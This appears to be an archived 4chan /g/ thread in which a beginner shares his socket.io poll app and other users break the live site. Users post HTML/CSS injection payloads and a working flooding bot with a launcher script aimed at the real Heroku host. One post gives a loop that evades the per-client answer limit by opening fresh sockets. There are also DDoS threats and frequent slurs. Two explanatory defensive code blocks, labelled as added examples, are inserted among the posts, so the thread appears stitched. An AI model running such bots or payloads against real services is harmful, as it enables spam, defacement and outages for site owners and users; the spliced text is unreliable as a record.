try my shitty web app

You are currently reading a thread in /g/ - Technology

Thread replies: 197
Thread images: 19
File: chrome_2016-04-09_00-33-26.png (16 KB, 841x674)
Hello /g/, I'm new to Express and socket.io so I made this little web app to practice. It's a rapid question and answer type app where you can post any question and comment upvotable answers to the questions. But after 20 seconds the question and all the answers are deleted and the next question comes up.

Here it is: https://rapidpoll.herokuapp.com/

Please note after 18 hours it has to go to sleep because I'm using the free Heroku plan and I'm poor as shit
>>
increased question duration to 40 seconds because 20s is too fast
>>
File: chrome_2016-04-09_13-18-42.png (165 KB, 839x926)
i dont know what i expected
>>
>>53952097
bumping for interest
>>
File: chrome_2016-04-09_13-21-52.png (23 KB, 828x409)
>>
>>53952097
If I post an answer, shouldn't it be upvoted automatically?
>>
>>53952749
maybe. Upvotes don't really count for anything tho, it's just for bragging points
>>
>>53952097
>upvotable
Just say vote you fucking redditfaggot
>>
>>53952097
Will you be posting this on GitHub?
>>
At least you learned to validate your inputs
>>
OP you might want to HTML escape your inputs to prevent people from injecting scripts.
>>
hahhaha no fucking way
>>
>>53952936
>>53952932
what happened? I missed it
>>
>>53953012
<style>* { transition-duration: 20s; transform: rotate(359deg); transition-timing-function: easeOutBounce}<style>
>>
What the fuck is happening?
>>
>>53952932
>>53952936
I DIDN'T FIX THE INPUTS ITS STILL HAPPENING SENPAI TEACH ME

>>53952804
https://github.com/williamyeny/rapidpoll
>>
who's been drawing deeks?
>>
literally poo in loo
>>
>>53953027
Are you injecting scripts via the post a question input? Trying to fix it
>>
>>53953076
Anon, I had so much fun, I'll buy you a month of cheap VPS hosting if you're really poor.
>>
can someone tell me exactly how they're injecting the scripts so I can fix it?

>>53953088
dude that would be fantastic
>>
>>53953121
Just type whatever script into the question input thingy
>>
People are fucking it up real good lol
>>
>>53953150
I would get out of there before someone posts something bad lmao
>>
>>53953027
you mean on server side tho, it should sanitize inputs on server, you can face fuck the client side anyway you want.
>>
>>53953168
don't give a fuck; not even on my own computer
>>
>>53953121
>>53953182

All I did (not the guy who did Hitler, though) is write a valid HTML tag as an answer. Either script or style. From there on, the world is your oyster.
>>
Plz OP don't fix this shit, it's hilarious
>>
>>53953121
OP, how old are you? Are you a student? Do you have access to GitHub's student developer pack?
>>
Please tell me someone took screenshots of people fucking up the site
>>
<iframe id="video" width="420" height="315" src="//www.youtube.com/embed/HgQEuPw942c?rel=0&arp;autoplay=1" frameborder="0" allowfullscreen></iframe>
>>
>>53953121
idk but you can escape html sequences maybe
>>
File: Screenshot_1.png (1 MB, 1165x800)
literally hitler
>>
This is hilarious
>>
>>53953311
There is literally nothing wrong with Hitler.
>>
Aaand it's gone
>>
mein sides
>>
The cockposter made it unusable
>>
Lol thanks guys, I think I figured out how to validate input. I'll fix it in a bit
>>
>>53953462
Thanks, OP. This was the most fun I've had in a while.
>>
apex kek at the stormfront redirect
>>
>>53953462
yay
>>
>>53953462
Yea you kno u just can't print anythin to the website w/out escaping special sequences. That's how people do sql injection.
>>
>>53953488
Cocks and stormfront, finally I get to use my js for something useful
>>
>>53952097
kek'd
>>
Hey guys, look into your cookiejar, I left a present
>>
>>53953507
Yeah well this is the first time I've had people actively try to break the site so it was a great learning opportunity for me
>>
File: chrome_2016-04-09_14-39-12.png (31 KB, 841x677)
I think this works for now
>>
you fags just crashed my shitty old laptop

fuck y'all
>>
File: chrome_2016-04-09_14-54-26.png (31 KB, 844x490)
This is NOT ME don't break my server too much
>>
bumping as op requested
>>
>>53952097
PUT A CHARACTER LIMIT YOU FAGET
>>
File: chrome_2016-04-09_14-02-21.png (75 KB, 759x606)
never forget
>>
File: 1400839805975.jpg (11 KB, 320x322)
>>53953930
>>
i put while(true){$('.upvote').click(); } and think i broke it
>>
>>53954186
wait no i didnt, i just crashed my tab
>>
>>53954186
>>53954199
being this dumb
>>
>>53954186
>>53954199
KEK
>>
>>53953121
>what is XSS
>>
File: marxismleninism.png (28 KB, 809x678)
>mfw
>>
>>53952097
https://github.com/williamyeny/rapidpoll/blob/master/public/js/script.js#L137-L151

var myArray = $("#answer-list li");
var count = 0;

// sort based on timestamp attribute
myArray.sort(function (a, b) {

    // convert to integers from strings
    a = parseInt($(a).attr("score"), 10);
    b = parseInt($(b).attr("score"), 10);
    count += 2;
    // compare
    if(a > b) {
        return -1;
    } else if(a < b) {
        return 1;
    } else {
        return 0;
    }
});


reduce this to b - a, desu. Also what is count for?
Also never commit commented code
>>
>>53954480
I was trying to sort answers by top but it made the site work horribly so I removed it. Also b - a just sorts an array of numbers, but I was trying to sort an array of divs based on the attribute score, so it required something a little more complex. count is something I forgot to remove when I copied and pasted it from here: http://jsfiddle.net/MikeGrace/Vgavb/
>>
>>53954699
I'm talking about:
    if(a > b) {
        return -1;
    } else if(a < b) {
        return 1;
    } else {
        return 0;
    }

There is no need when both a and b are integers. b - a is equivalent to the sort function.

Also with type coercion you don't need to explicitly convert the scores to ints.

return $(b).attr("score") - $(a).attr("score");

Also http://youmightnotneedjquery.com/#get_attributes
return b.getAttribute('score') - a.getAttribute('score');
>>
>>53954816
oohhhhh ok. Thanks a lot.
>>
stop fucking spamming you maggot shits
>>
>>53954929
Also you need to filter scripts on join. That bypasses your filtering.
Although it would be preferable to do it all server-side
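
The server-side handling suggested in the replies above (escape on the server, and apply it to what new clients receive on join as well as to live broadcasts), as an added example that is not OP's code or any poster's. The event names come from the thread; `AnswerBoard`, `cleanAnswer` and the 200-character cap are assumptions.

```javascript
// Added example, not rapidpoll's code. AnswerBoard, cleanAnswer and
// MAX_ANSWER_LENGTH are hypothetical names; the cap of 200 is an assumed value.
const MAX_ANSWER_LENGTH = 200;

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Escape the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Validate untrusted socket input on the server. Returns null when rejected.
function cleanAnswer(raw) {
  if (typeof raw !== 'string') return null; // clients can emit objects or arrays
  const text = raw.trim();
  if (text.length === 0 || text.length > MAX_ANSWER_LENGTH) return null;
  return text;
}

// Single store for answers: the live broadcast and the state sent on join
// both read from it, so no path hands out unescaped markup.
class AnswerBoard {
  constructor() {
    this.answers = [];
  }

  // Call from the "submit answer" handler; broadcast the returned object.
  submit(raw) {
    const text = cleanAnswer(raw);
    if (text === null) return null;
    const answer = { html: escapeHtml(text), score: 0 };
    this.answers.push(answer);
    return answer;
  }

  // Call from the "join" handler to send the current state to a new client.
  snapshot() {
    return this.answers.map((a) => ({ ...a }));
  }

  // Call when the question rotates.
  clear() {
    this.answers = [];
  }
}

// Sample input: the style-tag answer quoted earlier in the thread, shortened.
const SAMPLE_PAYLOAD = '<style>* { transform: rotate(359deg) }</style>';

// Shows that a live viewer and a late joiner receive the same escaped text.
function demo() {
  const board = new AnswerBoard();
  const live = board.submit(SAMPLE_PAYLOAD);
  const late = board.snapshot()[0];
  return { live: live.html, late: late.html };
}
```

The escaped string is meant for a client that inserts it as markup; a client that inserts with `textContent` or jQuery's `.text()` should be sent the validated raw text instead, or it will display the entities literally.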
>>
>>53952097
Which cunt was this

https://www.reddit.com/r/webdev/comments/4e2hn8/i_shared_my_web_app_to_4chan_and_forgot_to/
>>
>>53955110
>Didn't even post image of the website with spinning hittler
trash bantpost
>>
>>53955190
Oh whoops it's actually there. Nice.
>>
Well it was fun, OP was a hetero today
>>
I think the server crashed for a bit... poor Heroku server
>>
File: Screenshot_2016-04-10-00-12-52.png (163 KB, 1440x2560)
Ayyy
>>
>>53953150
>>53953168
Now *this* is quality assurance!
>>
>>53955704
plebbit intensifies
>>
>op now has everyone's IP
Great job, faggots.
>>
>>53955756
>worrying about IP

what is this, 2004?
>>
>>53955756
Op here, I'm so stupid I don't even know how to grab IPs. Do you know how?
>>
>>53955756
>Cares about his IP
>Still posts on 4chan
lmao
>>
>>53955807
request.connection.remoteAddress
>>
How about a character limit so people won't spam pasta?
>>
Broken?
>>
File: chrome_2016-04-09_17-28-27.png (18 KB, 839x462)
>>53955845
thanks lol
>>53955848
done
>>53955918
should be up
>>
>>53955940
Shit aside, this shit has potential.
It's simple yet funny, pay for some ads and it might actually be somewhat successful.
Nice job, OPie
>>
File: 765453.png (117 KB, 1280x2088)
>>
>>53956015
I've never implemented ads before so I'm waiting until Google can approve my Adsense account.

>>53956015
thanks man

>>53956045
bruh im poor as shit I just need 30 more cents to get the next tier of Heroku servers so I can run it 24/7
>>
upboats don't seem to move
>>
its down now
>>
and its dead
>>
> Application error

:(
>>
LIZARDSQUAD DDOS

GET FUCKED OP
>>
it died
>>
ITS FUCKED
>>
File: hikage.png (557 KB, 1000x1500)
sheeeet my question hasn't been answered fgt
>>
rip in pieces
>>
i honestly kinda liked it
>>
too many people ?
>>
Ripperoni Pepperoni
>>
it be back
>>
You should create different polling stations that revolve around certain subjects like a programming rapid poll and a math rapid poll
>>
it came back alive and then died again
>>
>>53956314
>>53956322
>>53956325
>>53956326
>>53956331
>>53956332
>>53956334
>>53956347
I'm using Heroku's free server, which can't handle hours of load like this. Please hit that $ so I can buy a better server :C
>>
isn't this basically a frankenstein combination of 4chan + reddit upboat system and no images?

if you added image support to OP it would basically be old 4chan from before captcha ruined it
>>
>>53956380
no
>>
>>53956380
How do I do that when the sites fucking down
>>
>>53956380
lol you poor ass pos

I can give you free hosting since i see potential in this, drop me your email so i can contact you
>>
>>53956380
Just pay those 30 cents from your own pocket, jew!
>>
>>53956388
it's basically a short lived 4chan thread with no image
>>
>>53956380
I could gib some buttcoin, like 2 dollars if you put the address on the site
>>
>>53956380
i already did
come back now please
>>
>>53956417
and no replies

if you could add cascading replies to the comments i think it would actually be better at being 4chan than 4chan does
>>
>>53956404
[email protected] thanks :o

>>53956409
Im in high school and unemployed :C
>inb4 underage
im 18

>>53956396
trying to boot it up again, give me a minute
>>
>>53956388
Not even close, lol
>>
how are you handling the scripts? i see someone already trying to spam the comments with a bot but they seem to get deleted after 1 second or so
>>
>>53956433
>>53956380
oh LOL IM RETARDED it's $7 for a hobby not $10 im scaling it up now
>>
you are retarted OP

also add a feature like 4chan where it updates the website title when it rotates to a new question

and make it unique when it rotates to the question you asked

do it or im never using your shit web app ever again op
>>
completely epic responses of random numbers
>>
some dick is spamming ...
>>
>>53956557
sorry mate I'll stop...
>>
ded
>>
>>53956538
don't post to my site or my wife's son's site ever again
>>
site keeps dying
>>
le doot squad ddos
>>
you broke it
>>
>>53956612
Connecting 100 clients is too much for the poor free heroku thing :(
>>
File: 1457455571782.jpg (117 KB, 1058x705)
>>53956625
>>
>>53956574
I don't know if you're the one spamming "please donate to OP" to try to make up that spam earlier but please stop if you are because its going to make me look like a jew
>>
someone please take this idea and make a non shit version

op seems like a retarded cunt begging for donations
>>
>>53956681
I know that's why I do it.
>>
guys i backtraced op lets dos him
https://github.com/williamyeny
>>
>>53956688
It's alright man I already bought the hobby dyno we good now. I just don't want people to yell at me when it sleeps because of Heroku's free plan. Please don't steal my idea it's one of the only original things I came up with
>>
>>53956728
>https://github.com/williamyeny/rapidpoll
can we fork it though?
>>
lol this faggot is really serious about spamming your website why not just ip ban him? sure he knows how to work around that but he will get tired eventually
>>
OP: Limit answers to one per question, and consolidate duplicate answers automatically.
>>
>>53956762
Yup you're right, I'm just sending shit from my laptop >_>
>>
>>53956759
yeah, but I won't be on my computer 24/7 so I think I'll do >>53956775
>>
>people are unironically opboating
>>
>>53956807
Duplicate answer detection is worthless, I can easily add a

socket.emit("submit answer", "some message" + Math.random().toFixed(3));


or something. That won't work at all
>>
>>53956807
Also someone mentioned banning IPs when messages sent went over a threshold, i think i'll do that too
>>
>>53956839
That was me, it would stop my spamming I know for sure, I'm not renting a botnet ;_;
>>
@anyone who wants to copy this and make a better version

>add user score similar to yikyak
>add phone number verification so score can be tracked through
>keep anonymity but mark OP as OP in the answers (similar to yikyak)
>ip session log to prevent spam
>make upvotes actually move the answers position
>>
>>53956894
OP here, if you look at the source I did implement a system where posts are sorted by score. However, it was super hard to read and vote answers because they jump all over the place
>>
Fix your fucking (lack of) security.
>>
>>53956894
>phone number verification
good idea!
also telemetry
>>
>>53956894
>add phone number verification so score can be tracked through

Users after he implements that: 0
>>
>>53956894
>>add phone number verification so score can be tracked through

Or just a random 6 digit code
>>
>>53956928
this

The whole point of an application like this is that it has no barrier to entry. The best I can think of is to add a captcha
>>
>>53956951
if he adds captcha it will literally just be a shittier version of 4chan
>>
>>53956974
It already is a shittier version of 4chan
>>
@OP: If you want to limit, answer posting or question posting to one user without limiting it to one IP, you may want to look into user fingerprinting.

It'll take a lot of user-specific pieces of information and combine them to create an identifier unique to that user.

If you want users that may be under the same IP to still use your app, e.g. coworkers or family members, this is a good route to go.

Valve actually has a javascript library written just for this. https://github.com/Valve/fingerprintjs2
>>
I'm thinking of a one-time captcha when you open the app (not every question). thoughts?

>>53956998
thanks for the info
>>
yall know this is node right? he's only facing scripters now but you can literally inject in ~15 minutes of work. captchas wont save someone from that, you need an ip session not a tab session lock if you want to get serious
>>
>>53957030
>captcha
Fuck no, captcha is owned by the Jewish BOTNET called Google.
>>
>>53956998

Yeah, I'll open source the spamming script

haxx.js
var io = require('socket.io-client');

function shitpost(state) {
state.count += 1;
state.socket.emit("submit answer", "test");
if (state.count === 3) {
disconnect(state);
}
setTimeout(shitpost, Math.random() * 5500, state);
}

function connect() {
var socket = io.connect('ws://rapidpoll.herokuapp.com/', {
port: 1337,
forceNew: true
});
var state = {count: 0, timeoutId: 0, socket: socket};

socket.on('connect', function (err) {
socket.emit("join");
setTimeout(shitpost, Math.random() * 5500, state);
});
}

function disconnect(state) {
state.socket.disconnect();
connect();
}

connect();


haxx.sh
for i in {1..15}
do
( node haxx & )
done
>>
OP, an idea might be to limit the number of answers that can be posted in total, so people focus more on actual voting. At the moment, it's easier to just spam your three answers and vote in that way, which seems not to be the intended use. Maybe make it lock off answer submissions after 5 or so posts?
>>
Perhaps also limit the amount of questions one person can have in the queue at the same time. Not a problem now but if this becomes successful and you have 100-1000 users on simultaneously it will take quite a while waiting if people can have more than one question pending.
>>
OCD fag here, arrow buttons on Chrome are vertically off center, on FF they're okay enough.

fix it in chrome without screwing up FF by updating the .submit-div CSS. Remove float: right; and change the margin-top from 5px to 2px.
>>
>>53952760
I'll take this bait.

>made it so you can see the best answer

So that makes him a redditfag?


>>53952097

The only thing i can think of is add a funny vote and helpful vote
>>
>>53957232
>most upboats = best answer
>>
you need a text limit
>>
>>53957248
>fill text field with 10 GB RAM worth of text
Feels good falling for the 16 GB RAM meme.
>>
javascript are pictures t-too, anon
>>
COME ON OP JUST IP BAN THE GUY ALREADY!
>>
>>53957244
If you continued reading i said add a helpful or funny votes. You're probably one of the kids who I nly hears what her wants and when he hears somthing he doesnt like he needs a "safe place" go back to your nigger sheltered life. But more perfabile dont and just kill yourself now.
>>
>>53957265
>implying that I would stop at 10gb of text
>>
>>53957354
I don't know how. You guys are forgetting I literally just picked up node and express and made this app to practice. I don't know how to do jack shit because im stupid
>>
its ded
>>
>answers is spam
>questions is spam

yep its shit
>>
NOW YOU GUYS HAVE REALLY DONE IT!

"Application Error

An error occurred in the application and your page could not be served. Please try again in a few moments.

If you are the application owner, check your logs for details."
>>
how much in donations have you received ?
>>
>>53957385
That's why you don't post your website on 4chan...
>>
>>53957411
at least OP is learning why testing is important in the real world.
>>
I have just purchased rapidpoll.com

I might allow you to buy it from me OP
>>
>>53957421
Testing was a mem-tier hype. Microsoft stopped testing before production.
>>
File: shitpost.png (71 KB, 1806x933)
>>53957369
>>
>>53957372
Your app's code looks better than >50% of the web devs I've had apply to my workplace. App idea is really novel too. Keep it up, we all start somewhere.
>>
>>53957405
Only 1 donation of $10 ($9 after fees).

>>53957379
yeah, it's gone to shit already. Thanks spammer.
>>
>>53952097
>deleting client's questions when he disconnects

why?
>>
aaaand it's dead again

>>53957451
Thanks, it's a bit messy but it works.
>>
challenge for the scripters: set your script to upvote the highest position comment over and over, instead of spamming
>>
>>53957458
to prevent people from spamming the question queue by refreshing the page

>>53957442
If you think an incompetent poor-ass teenager with little backend experience can successfully manage this app long enough for it to deserve its own domain you're an idiot
>>
>>53952097

>read code
>realize how many holes there are in the backend
>use them to send "faggotry knows no bounds" +1000 at a time
>mfw
>>
>>53957751
That's what I get for open-sourcing my code, I guess. Since it's obvious my backend skills are too weak to handle spammers and dicks always want to spam it, I'm going to leave it off. Hope you're happy.
>>
>>53957806
hope you learned a lesson at least.
>>
>>53957818
you didn't explain to him where did he make the error, so you are still a faggot
>>
>>53957831
for (i=0;i<1000;i++){var socket = io(); socket.emit("submit answer", "faggotry knows no bounds ")}

creating a new socket connection every loop creates a new client id, and the maximum answer limit doesn't apply on me anymore.

Oh and by the way, you're a faggot.
>>
>>53957871
and I found it while being high as fuck, there must be more faggotries in the backend like that
>>
>>53957871
rude desu
>>
File: 1455144797430.png (62 KB, 235x207)
>>53957871
>he found broken code in a first timer's code

I mean, there's top kek banter, and then there's being a faggot.
>>
>>53957960
whose line is it anyways?
>>
File: fknb.jpg (300 KB, 750x1334)
>>53957806

this shit could be found by just reading the assets on the front end. so you open sourcing the code or not wouldn't have prevented this vulnerability from being found.
>>
Alright, the server restarts itself automatically after 20 min, so that's why it's up. However, if it goes down again, it'll go down for up to 320 min (over 5 hours) so keep that in mind. I have to leave for today, keep shitposting

>>53957871
>>53958004
Thanks, I'll look into this tomorrow. Any ideas to prevent this? Other anons have already given me some pretty good ideas, just want to see if there's any other options.
>>
>>53958087
keeping the ip address of the poster in the answer object in the backend, before adding a new answer to the array, count the number of answers by IP instead of just client.id

you're welcome little fag
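
The per-IP counting suggested in the post above, as an added example that is not OP's code or the poster's: it compares a limiter keyed by socket id with one keyed by client address when one host opens a new connection for every answer. `AnswerLimiter`, `clientIp`, the limit of 3 and the single-trusted-proxy reading of `X-Forwarded-For` are assumptions; the sample connections are constructed.

```javascript
// Added example, not rapidpoll's code. Names and the limit value are hypothetical.
const MAX_ANSWERS_PER_QUESTION = 3; // assumed per-question limit

// Resolve the address to key on from a socket.io handshake object.
// Assumption: exactly one trusted reverse proxy sits in front of the app and
// appends the peer address to X-Forwarded-For, so the LAST entry is the one
// the client cannot forge. Without a proxy, fall back to handshake.address.
function clientIp(handshake) {
  const fwd = handshake.headers && handshake.headers['x-forwarded-for'];
  if (typeof fwd === 'string' && fwd.length > 0) {
    const hops = fwd.split(',').map((s) => s.trim());
    return hops[hops.length - 1];
  }
  return handshake.address;
}

// Counts accepted answers per key for the current question.
class AnswerLimiter {
  constructor(limit) {
    this.limit = limit;
    this.counts = new Map();
  }

  // Returns true and records the answer if the key is still under the limit.
  tryConsume(key) {
    const used = this.counts.get(key) || 0;
    if (used >= this.limit) return false;
    this.counts.set(key, used + 1);
    return true;
  }

  // Call when the question rotates.
  reset() {
    this.counts.clear();
  }
}

// Constructed input: n connections from one host, each with a fresh socket id.
// 203.0.113.7 and 10.0.0.1 are documentation / private-range sample addresses.
function constructedConnections(n) {
  return Array.from({ length: n }, (_, i) => ({
    id: 'sock-' + i,
    handshake: {
      address: '10.0.0.1', // the proxy, as seen by the app
      headers: { 'x-forwarded-for': '203.0.113.7' },
    },
  }));
}

// Feed one answer per connection through a limiter keyed by keyOf(conn)
// and return how many answers were accepted.
function acceptedAnswers(keyOf, connections) {
  const limiter = new AnswerLimiter(MAX_ANSWERS_PER_QUESTION);
  let accepted = 0;
  for (const conn of connections) {
    if (limiter.tryConsume(keyOf(conn))) accepted += 1;
  }
  return accepted;
}

const byId = acceptedAnswers((c) => c.id, constructedConnections(1000));
const byIp = acceptedAnswers((c) => clientIp(c.handshake), constructedConnections(1000));
console.log({ byId, byIp });
```

Keying on the address also caps everyone behind the same NAT together, which is the trade-off the fingerprinting reply earlier in the thread points at.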
>>
>>53957806
Never go open-sores again.
>>
>>53958150
Dicks want to spam your backend?
>>
>>53958282
Well, he is OP
>>
>>53952097
owning your app like a bitch op, wh?, because my faggotry knows no bounds :^)
>>
>>53953839
>Ethan Bradberry
I literally died
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.